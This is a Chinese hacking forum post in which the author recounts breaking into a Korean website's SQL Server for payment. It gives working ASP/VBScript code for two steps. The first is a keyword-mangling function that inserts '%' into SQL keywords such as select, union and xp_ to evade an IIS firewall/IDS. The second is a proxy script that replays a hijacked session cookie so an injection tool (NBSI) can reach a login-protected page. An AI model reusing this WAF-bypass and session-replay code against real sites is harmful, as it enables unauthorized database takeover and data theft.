最近看过此主题的会员

返回列表 发帖
当入侵遇到ids
前段时间帮朋友检测一个韩国的网站发现有明显的sql漏洞。。但是 网站上安装了iis 防火墙。。郁闷了半天。。
现在有两个问题要解决了才能继续
1.饶过iis 防火墙
2.网站必须要登陆后才能访问那个有漏洞的页面。
废话不说。点根烟。先解决第一个问题。
查了下资料lcx大牛 也遇到过这样的防火墙的说。。把lcx 大牛用vbs写的sql2005注射程序down 下来 提取了部分代码。如下。。
Function ReplaceKeyWord(Value)
   Table = "select->se%lect|[k]|insert->in%sert|[k]|update->u%pdate|[k]|delete->dele%te|[k]|drop->dr%op|[k]|alter->al%ter|[k]|create->crea%te|[k]|inner->in%ner|[k]|join->jo%in|[k]|from->fro%m|[k]|where->w%here|[k]|union->unio%n|[k]|group->grou%p|[k]|by->b%y|[k]|having->hav%ing|[k]|table->tab%le|[k]|shutdown->shu%tdown|[k]|kill->k%ill|[k]|declare->dec%lare|[k]|open->o%pen|[k]|pwdencrypt->pwdencr%ypt|[k]|msdasql->m%sdasql|[k]|sqloledb->sqlo%ledb|[k]|char->c%har|[k]|fetch->fe%tch|[k]|nExt->ne%xt|[k]|allocate->al%locate|[k]|sys->s%ys|[k]|raiserror->raiser%ror|[k]|Exec->e%xec|[k]|=!->=%!|[k]|--->-%-|[k]|xp_->x%p_|[k]|sp_->s%p_|[k]|and->a%nd"
   Dim i, Relpacement, Temp
   Relpacement = Split(Table, "|[k]|")
   ReplaceKeyWord = Value
For i = 0 to UBound(Relpacement)
   Temp = Split(Relpacement(i), "->")
   If UBound(Temp) = 1 Then ReplaceKeyWord = Replace(ReplaceKeyWord, Temp(0), Temp(1))
    NExt
End Function
感觉没跟人家说就把代码偷出来自己用。。怪不好的但是。。我也要吃饭啊。。哎。。。继续努力。
第一个问题解决了。然后就是登陆问题。我们都知道。http协议里。cookie。和session id 其实是一样滴。。。
这样问题就好办了。。又点一根烟。。花了10分钟。。。写了如下代码。
<%
'http://127.0.0.1/Easp.asp?id=003-067000-012647
'by Ethan
'qq:283207388
url = "http://xxx.xxx.kr/xxx_loan_xxx_.asp?cnumber="
id = request("id")
s = url &amp; ReplaceKeyWord(id)
response.write s
response.write BytesToBstr(getbody(s),"GB2312")
function GetBody(url)
strurl=split(url,"?")
Dim Http
Set Http =Server.CreateObject("msxml2.serverXMLHTTP")
With Http
.Open "POST",strurl(0),False
.SetRequestHeader "Content-Length",Len(strurl(1))
.SetRequestHeader "Content-Type","application/x-www-form-urlencoded"
.SetRequestHeader "Referer","http://xxx.xxx.kr/xxxx_index.asp"
.SetRequestHeader "Cookie","ASPSESSIONIDSAQTCSRR=PLOLFDGCOEDGACOAMMBOLDLB; member%5Fname=rnjs1; member%5Fid=003%2D067000; log%5Fid2=; member%5Fcate=3; md5%5Fpass=; log%5Fid1="
.Send strurl(1)
PostData = .ResponseBody
End With
Set Http = Nothing
GetBody =PostData
End Function
Function BytesToBstr(Body, Cset)
      Dim objstream
      Set objstream = Server.CreateObject("adodb.stream")
       objstream.Type = 1
       objstream.Mode = 3
       objstream.Open
       objstream.Write Body
       objstream.Position = 0
       objstream.Type = 2
       objstream.Charset = Cset
       BytesToBstr = objstream.ReadTExt
       objstream.Close
      Set objstream = Nothing
End Function
Function ReplaceKeyWord(Value)'绕过ids过虑lcx大牛写滴 。。。
   Table = "select->se%lect|[k]|insert->in%sert|[k]|update->u%pdate|[k]|delete->dele%te|[k]|drop->dr%op|[k]|alter->al%ter|[k]|create->crea%te|[k]|inner->in%ner|[k]|join->jo%in|[k]|from->fro%m|[k]|where->w%here|[k]|union->unio%n|[k]|group->grou%p|[k]|by->b%y|[k]|having->hav%ing|[k]|table->tab%le|[k]|shutdown->shu%tdown|[k]|kill->k%ill|[k]|declare->dec%lare|[k]|open->o%pen|[k]|pwdencrypt->pwdencr%ypt|[k]|msdasql->m%sdasql|[k]|sqloledb->sqlo%ledb|[k]|char->c%har|[k]|fetch->fe%tch|[k]|nExt->ne%xt|[k]|allocate->al%locate|[k]|sys->s%ys|[k]|raiserror->raiser%ror|[k]|Exec->e%xec|[k]|=!->=%!|[k]|--->-%-|[k]|xp_->x%p_|[k]|sp_->s%p_|[k]|and->a%nd"
   Dim i, Relpacement, Temp
   Relpacement = Split(Table, "|[k]|")
   ReplaceKeyWord = Value
For i = 0 to UBound(Relpacement)
   Temp = Split(Relpacement(i), "->")
   If UBound(Temp) = 1 Then ReplaceKeyWord = Replace(ReplaceKeyWord, Temp(0), Temp(1))
    NExt
End Function
%>
配置了下iis 打开nbsi 加入http://127.0.0.1/Easp.asp?id=003-067000-012647 进行艰苦滴注射 获得sql 服务器管理权限。。然后经过两天。。完工 收钱走人。。。




















公告:https://www.sitedirsec.com公布最新漏洞,请关注

 

您可能还想看的主题:

基于各种原因,非安全中国网正进行秘密计划敬请期待

TOP

返回列表